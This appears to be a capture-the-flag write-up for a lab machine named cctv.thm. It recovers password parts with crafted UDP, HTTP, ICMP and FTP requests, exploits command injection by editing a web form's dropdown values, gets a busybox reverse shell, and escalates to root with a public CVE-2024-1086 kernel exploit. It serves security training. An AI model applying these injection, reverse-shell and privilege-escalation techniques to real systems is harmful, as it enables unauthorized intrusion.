# Bypass {% embed url="" %} The following post by 0xb0b is licensed under [CC BY 4.0

](http://creativecommons.org/licenses/by/4.0/?ref=chooser-v1) *** ## Recon We start with a Nmap scan and discover three open ports, SSH on port 22 and an `Apache/2.4.41` web server on ports 80 and 443, each of which provides a web page. After a version and default script scan, we only see that the results return a 403 forbidden and the certificate information on 443.

Calling the index page on port `80` only gave a `403` forbidden response, which we get on any requested resources. On the index page on port `443` we receive a login prompt that expects a password.

If we look at the source, we discover an interesting comment that refers to the endpoint `/mail`.

On this endpoint, we find a directory listing with the file `dump.txt.`

Here we find instructions to recover the password for the login on index. Each request on `/fpassword.php?id` recovers a part of the flag. To retrieve the flags at `/fpassword.php?id` one needs to send specially crafted packets first and then request the source. We will discuss each individual requirement below.

## First Login As already stated, we have to restore parts of the password. {% code overflow="wrap" %} ``` After receiving all the flags, you can visit the MACHINE IP that will ask you for the password. The first password will be concatenated values of all five flags you have received above. ``` {% endcode %} ### cctv.thm/fpassword.php?id=1 > ``` > Make a UDP request to the machine with source port number 5000. > Once done, you can fetch the flag through /fpassword.php?id=1 > ``` To make a UDP request, we use the command line tool nc with the flag `-u` to specify that we want to use UDP. Furthermore, we define the source and destination port as `5000` and additionally send some data to that port, even though the requested port seems closed on the nmap scan. ```bash echo -n "Crafted packet for password recovery" | nc -u -w1 -p 5000 cctv.thm 5000 ``` After submitting the command, we are able to retrieve the first flag at `https://cctv.thm/fpassword.php?id=1`.

### cctv.thm/fpassword.php?id=2 > ``` > Make a TCP request to fpassword.php?id=2 with user-agent set as "I am Steve Friend". > Once done, you can fetch the flag through /fpassword.php?id=2 > ``` Here we have to make a TCP request with a special user-agent. Since HTTP operates on TCP, we just make an HTTP request using cURL with a custom user agent specified via parameter `-A`. ```bash curl -A "I am Steve Friend" http://cctv.thm/password.php?id=2 ``` After submitting the command, we are able to retrieve the second flag at `https://cctv.thm/fpassword.php?id=2`.

### cctv.thm/fpassword.php?id=3 > ``` > Send a ping packet to the machine appearing as Mozilla browser > (Hint: packet content with user agent set as Mozilla). > Once done, you can fetch the flag through /fpassword.php?id=3 > ``` Next, for the third flag, we need to send data via an ICMP ping. For this we use the ping command using the `-p` option which allows you to specify the pattern used to fill the payload of the ICMP echo request packets. When you use `-p` followed by a pattern, such as `-p ff`, it fills the packet with the specified pattern.
{% embed url="" %} But we only have 16 bytes available, and the payload must be hex encoded. We use CyberChef to decode Mozilla to its hex representation `4d6f7a696c6c61`.

```bash ping -p 4d6f7a696c6c61 cctv.thm ``` After submitting the command, we are able to retrieve the third flag at `https://cctv.thm/fpassword.php?id=3`.

### cctv.thm/fpassword.php?id=4 > {% code overflow="wrap" %} > > ``` > Attempt to login to the FTP server with content containing the word "user" in it. > Once done, you can fetch the flag from /fpassword.php?id=4 > ``` > > {% endcode %} Now we need to make a login attempt to the ftp server with the content containing the word user. For this, just issuing the following command is sufficient. ```bash ftp cctv.thm ``` After submitting the command, we are able to retrieve the fourth flag at `https://cctv.thm/fpassword.php?id=4`.

### cctv.thm/fpassword.php?id=5 > {% code overflow="wrap" %} > > ``` > Send TCP request to flagger.cgi endpoint with a host header containing more than 50 characters. > Once done, you can fetch the flag from /fpassword.php?id=5 > ``` > > {% endcode %} Lastly, we need to make a TCP request on endpoint flagger.cgi with a host header containing more than 50 characters. Like in the second flag, a cURL request is sufficient, but this time we specify the host via the `-H` header parameter. {% code overflow="wrap" %} ```bash curl -H "Host: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" http://cctv.thm/flagger.cgi ``` {% endcode %} After submitting the command, we are able to retrieve the fifth flag at `https://cctv.thm/fpassword.php?id=5`.

### Logging in Now we have all five parts of the password together, we can concat those to craft the password. Don't forget that the password consists of the whole flag parts.

After submitting the password, we log in and find another login field, requiring username and password. Furthermore, we see a timestamp, which looks like a dropdown with a single entry.

## Second Login For the second login we only need the username since we have the password already. The username is the machines' hostname. The developer excludes the possibility of command injection for his application. This will probably not be the case. > {% code overflow="wrap" %} > > ``` > For the second layer of security, I have enabled a wholly sandboxed login environment with no connection to the database and no possibility of command execution. The username is the computer's hostname, and the password is the same as the previous password. I will SMS you the details as well. > ``` > > {% endcode %} We look at the source of the page and see that the drop-down is part of a form. It is very suspicious that commands can be selected here. The value of an option element is probably the command that is executed.

The JavaScript code listens for the `DOMContentLoaded` event and attaches an event listener to the dropdown element. When the dropdown selection changes, it submits the form associated with the form element named `myform`. So all we have to do is expand the form with commands that we want to execute.

### What is the username for the CCTV web panel? So, let's get the username, I mean hostname of the machine. > ``` > The username is the computer's hostname, [...] > ``` This is how the element could look like. ``` ``` We can add this by making use of the development tools of Firefox or chrome. We just duplicate the node and edit its value content. To get the hostname, we just change the value to hostname. After having the dropdown prepared, we trigger it by selecting the second item.

Here is the procedure:

### What is the lsb\_release -r -s command output from the attached machine? We repeat the process to get the Linux standard base. ``` ``` ### What is the flag value after logging into the CCTV web panel? After logging in ...

... we have access to the cctvs and the final flag.

## Bonus: Initial Foothold + Privilege Escalation Being curious, we try to get on the machine using a reverse shell.

After setting up a listener and triggering the selection, we are able to catch a reverse shell using busybox.

We are dealing with the kernel `5.15.0-1041`. Maybe we could get root privileges with a kernel exploit.

The poc of `CVE-2024-1086` is a promising one. We compile the following and bring that to the machine. {% embed url="" %} After executing the exploit we get root privileges.